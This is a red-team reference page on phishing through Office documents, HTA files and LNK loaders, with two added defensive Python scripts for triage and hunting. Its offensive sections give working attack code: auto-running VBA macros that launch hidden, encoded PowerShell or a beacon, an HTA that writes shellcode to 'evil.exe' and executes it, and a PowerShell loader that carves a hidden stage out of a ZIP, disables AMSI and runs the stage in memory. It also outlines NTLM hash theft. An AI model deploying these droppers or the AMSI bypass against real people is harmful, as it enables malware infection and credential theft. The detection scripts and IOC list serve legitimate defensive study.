Phishing Files and Documents


tip

Learn and practise AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practise GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practise Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Office Documents

Microsoft Word performs file data validation before opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.

Usually, Word files containing macros use the .docm extension. However, it is possible to rename the file by changing the extension and still keep its macro-executing capability.
For example, an RTF file does not support macros by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of executing macros.
The same internals and mechanisms apply to all software of the Microsoft Office Suite (Excel, PowerPoint etc.).

You can use the following command to check which extensions are going to be executed by some Office programs:

```bash
assoc | findstr /i "word excel powerp"
```

DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can also "execute" macros.

Loading External Images

Go to: Insert --> Quick Parts --> Field
Categories: Links and References, Field names: includePicture, and Filename or URL: http:///whatever
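From the defender's side, the three tricks above (a macro-enabled document hiding behind another extension, a remote attachedTemplate, and an INCLUDEPICTURE field fetching a URL) all leave static traces inside the OOXML container. The following script is an added example, not code from the original page: it classifies a file by its magic bytes the way Word does, ignoring the extension, and reports those indicators. The sample document in build_sample() is constructed in memory for the demo, and example.invalid, the file names and the stub VBA project are placeholders.

```python
"""Static triage of an Office file by content rather than extension (added example)."""
import io
import re
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls/.ppt (CFB)
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML (.docx/.docm/.xlsm ...)
RTF_MAGIC = b"{\\rtf"

_REL = re.compile(rb"<Relationship\b[^>]*>", re.I)
_ATTR = re.compile(rb'(\w+)="([^"]*)"')
_INCLUDEPICTURE = re.compile(rb'INCLUDEPICTURE\s+"?([^"\s<]+)', re.I)


def container_type(data: bytes) -> str:
    """Classify by magic bytes; Word ignores the extension and does the same."""
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    if data.startswith(OLE_MAGIC):
        return "ole"
    if data.startswith(RTF_MAGIC):
        return "rtf"
    return "unknown"


def triage(data: bytes, filename: str) -> dict:
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = container_type(data)
    result = {
        "container": kind,
        "extension": ext,
        # an OOXML/OLE container under a .rtf name, or OLE under .docx, is the
        # renaming trick described above
        "extension_mismatch": (ext == "rtf" and kind != "rtf")
        or (ext == "docx" and kind == "ole"),
        "has_vba": False,
        "macros_possible": kind == "ole",  # OLE needs a dedicated parser (e.g. oletools)
        "remote_template": False,
        "external_targets": [],
        "includepicture_urls": [],
    }
    if kind != "ooxml":
        return result

    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # the VBA project is a plain part in the package, whatever the extension says
        result["has_vba"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        result["macros_possible"] = result["has_vba"]
        for name in names:
            if name.endswith(".rels"):
                for rel in _REL.findall(zf.read(name)):
                    attrs = {k.decode().lower(): v.decode() for k, v in _ATTR.findall(rel)}
                    # TargetMode="External" means the package will reach outside itself
                    if attrs.get("targetmode", "").lower() == "external":
                        result["external_targets"].append(attrs.get("target", ""))
                        if "attachedTemplate" in attrs.get("type", ""):
                            result["remote_template"] = True
        if "word/document.xml" in names:
            xml = zf.read("word/document.xml")
            result["includepicture_urls"] = [m.decode() for m in _INCLUDEPICTURE.findall(xml)]
    return result


def build_sample() -> bytes:
    """Constructed demo document: VBA project, remote template, INCLUDEPICTURE field."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/vbaProject.bin", b"constructed stub, not a real VBA project")
        zf.writestr(
            "word/document.xml",
            '<w:document><w:instrText> INCLUDEPICTURE "http://example.invalid/logo.png" '
            "</w:instrText></w:document>",
        )
        zf.writestr(
            "word/_rels/settings.xml.rels",
            '<Relationships><Relationship Id="rId1" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
            'Target="http://example.invalid/template.dotm" TargetMode="External"/></Relationships>',
        )
    return buf.getvalue()


if __name__ == "__main__":
    # the same bytes saved as "invoice.rtf" are still an OOXML package with macros
    for key, value in triage(build_sample(), "invoice.rtf").items():
        print(f"{key:20} {value}")
```

A mail gateway or EDR rule built on this logic keys on the container and its parts, not on the file name, which is exactly the assumption the renaming trick relies on.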

Macros Backdoor

It is possible to use macros to run arbitrary code from the document.

Autoload functions

The more common they are, the more likely the AV is to detect them.

  • AutoOpen()
  • Document_Open()

Macro Code Examples

```vba
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc <base64-encoded command>")
End Sub
```
```vba
Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub
```
```vba
' Reads the document's Author property and feeds it to PowerShell on stdin
Dim author As String
Set oWB = ActiveDocument
Set objWshell1 = CreateObject("WScript.Shell")
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -WindowStyle hidden -Command -")
.StdIn.WriteLine author
.StdIn.WriteBlankLines 1
End With
```
```vba
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>"
```

Manually remove metadata

Go to File > Info > Inspect Document > Inspect Document, which opens the Document Inspector. Click Inspect and then Remove All next to Document Properties and Personal Information.

Doc Extension

When finished, select the Save as type dropdown and change the format from .docx to Word 97-2003 .doc.
Do this because you can't save macros inside a .docx and there is a stigma around the macro-enabled .docm extension (e.g. the thumbnail icon has a huge ! and some web/email gateways block them entirely). Therefore, the legacy .doc extension is the best compromise.

Malicious Macros Generators

HTA Files

HTA is a Windows program that combines HTML and scripting languages (such as VBScript and JScript). It generates the user interface and executes as a "fully trusted" application, without the constraints of a browser's security model.

An HTA is executed using mshta.exe, which is typically installed along with Internet Explorer, making mshta dependent on IE. So if IE has been uninstalled, HTAs will be unable to execute.

```html
<!-- Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>
```
```html
<!-- Cobalt Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>
```

Forcing NTLM Authentication

There are several ways to force NTLM authentication "remotely"; for example, you could add invisible images to emails or HTML that the user will access (even HTTP MitM?), or send the victim the address of a file that will trigger an authentication just by opening the folder.

Check these ideas and more in the following pages:

Force NTLM Privileged Authentication

Places to steal NTLM creds

NTLM Relay

Don't forget that you can not only steal the hash or the authentication but also perform NTLM relay attacks:

LNK Loaders + ZIP-Embedded Payloads (fileless chain)

Highly effective campaigns deliver a ZIP containing two legitimate decoy documents (PDF/DOCX) and a malicious .lnk. The trick is that the actual PowerShell loader is stored inside the raw bytes of the ZIP after a unique marker, and the .lnk carves it out and runs it entirely in memory.

Typical flow executed by the .lnk PowerShell one-liner:

  1. Locate the original ZIP in the usual paths: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, and the parent of the current working directory.
  2. Read the ZIP bytes and find the hardcoded marker (e.g. xFIQCV). Everything after the marker is the embedded PowerShell payload.
  3. Copy the ZIP to %ProgramData%, extract it there, and open the decoy .docx so it looks legitimate.
  4. Bypass AMSI for the current process: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
  5. Deobfuscate the next stage (e.g. remove all # characters) and execute it in memory.

Example PowerShell skeleton to carve and run the embedded stage:

```powershell
$marker   = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths    = @(
"$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Documents",
"$env:TEMP", "$env:ProgramData", (Get-Location).Path, (Get-Item '..').FullName
)
$zip = Get-ChildItem -Path $paths -Filter *.zip -ErrorAction SilentlyContinue -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1
if(-not $zip){ return }
$bytes = [IO.File]::ReadAllBytes($zip.FullName)
$idx   = [System.MemoryExtensions]::IndexOf($bytes, $marker)
if($idx -lt 0){ return }
$stage = $bytes[($idx + $marker.Length) .. ($bytes.Length-1)]
$code  = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Expression $code
```

Notes

  • Delivery often abuses reputable PaaS subdomains (e.g. *.herokuapp.com) and may gate payloads (serving benign ZIPs depending on IP/UA).
  • The next stage frequently decrypts base64/XOR shellcode and executes it via Reflection.Emit + VirtualAlloc to minimise on-disk artefacts.

Persistence used in the same chain

  • COM TypeLib hijacking of the Microsoft Web Browser control so that IE/Explorer or any app embedding it re-launches the payload automatically. See details and ready-to-use commands here:

COM Hijacking

Hunting/IOCs

  • ZIP files containing the ASCII marker string (e.g., xFIQCV) appended to the archive data.
  • .lnk that enumerates parent/user folders to locate the ZIP and opens a decoy document.
  • AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
  • Long-running business threads ending with links hosted under trusted PaaS domains.
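The first two IoCs above can be checked statically: a ZIP that must stay openable for the decoys yet carries the stage means the stage sits in the raw bytes past the End Of Central Directory (EOCD) record, right after the marker. The following hunter is an added example, not code from the original page. It parses the EOCD to measure the trailing data, looks for the marker, strips the # characters the chain uses for obfuscation, and checks the result for the AMSI tampering strings listed above. build_sample_zip() constructs the archive for the demo; the appended text is a constructed stand-in containing only the AMSI one-liner already quoted on this page.

```python
"""Hunt for a stage appended to a ZIP archive after a marker (added example)."""
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"
MARKER = b"xFIQCV"  # marker string reported for this chain
# strings the deobfuscated stage has to contain to tamper with AMSI
AMSI_STRINGS = (b"AmsiUtils", b"amsiInitFailed")


def trailing_data(data: bytes) -> bytes:
    """Return whatever follows the EOCD record and its optional comment.

    EOCD layout: 4-byte signature, 16 bytes of counts/offsets, then a 2-byte
    comment length at offset 20, then the comment. Anything after that is not
    part of the archive and is ignored by every ZIP reader."""
    idx = data.rfind(EOCD_SIG)
    if idx < 0:
        raise ValueError("no End Of Central Directory record: not a ZIP")
    comment_len = struct.unpack_from("<H", data, idx + 20)[0]
    return data[idx + 22 + comment_len:]


def hunt(data: bytes) -> dict:
    tail = trailing_data(data)
    marker_at = data.find(MARKER)
    stage = data[marker_at + len(MARKER):] if marker_at >= 0 else b""
    # the chain strips '#' before executing; do the same to see through it
    deobfuscated = stage.replace(b"#", b"")
    return {
        "still_valid_zip": zipfile.is_zipfile(io.BytesIO(data)),
        "trailing_bytes": len(tail),
        "marker_found": marker_at >= 0,
        "marker_in_trailing": marker_at >= 0 and marker_at >= len(data) - len(tail),
        "amsi_tamper": any(s in deobfuscated for s in AMSI_STRINGS),
        "stage_preview": deobfuscated[:60].decode("utf-8", "replace"),
    }


def build_sample_zip(append_stage: bool) -> bytes:
    """Constructed demo archive: two decoy entries, optionally with a marker and
    an obfuscated stand-in stage appended after the EOCD record."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.pdf", b"constructed decoy content")
        zf.writestr("notes.docx", b"constructed decoy content")
    data = buf.getvalue()
    if append_stage:
        # '#' inserted into the AMSI one-liner this page lists as an indicator
        stage = b"[System.Manag#ement.Automation.Am#siUtils]::amsiIn#itFailed = $true\n"
        data += MARKER + stage
    return data


if __name__ == "__main__":
    for label, sample in (("clean", build_sample_zip(False)), ("tampered", build_sample_zip(True))):
        print(label, hunt(sample))
```

On real samples, run trailing_data() over every ZIP attachment first: any non-zero trailing length is unusual for archives produced by normal tooling and is worth a look even when the marker differs from xFIQCV. A long EOCD comment is the other place a stage can hide while the archive stays valid, so log comment_len as well when you adapt this.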

Windows files to steal NTLM hashes

Check the page about places to steal NTLM creds:

Places to steal NTLM creds
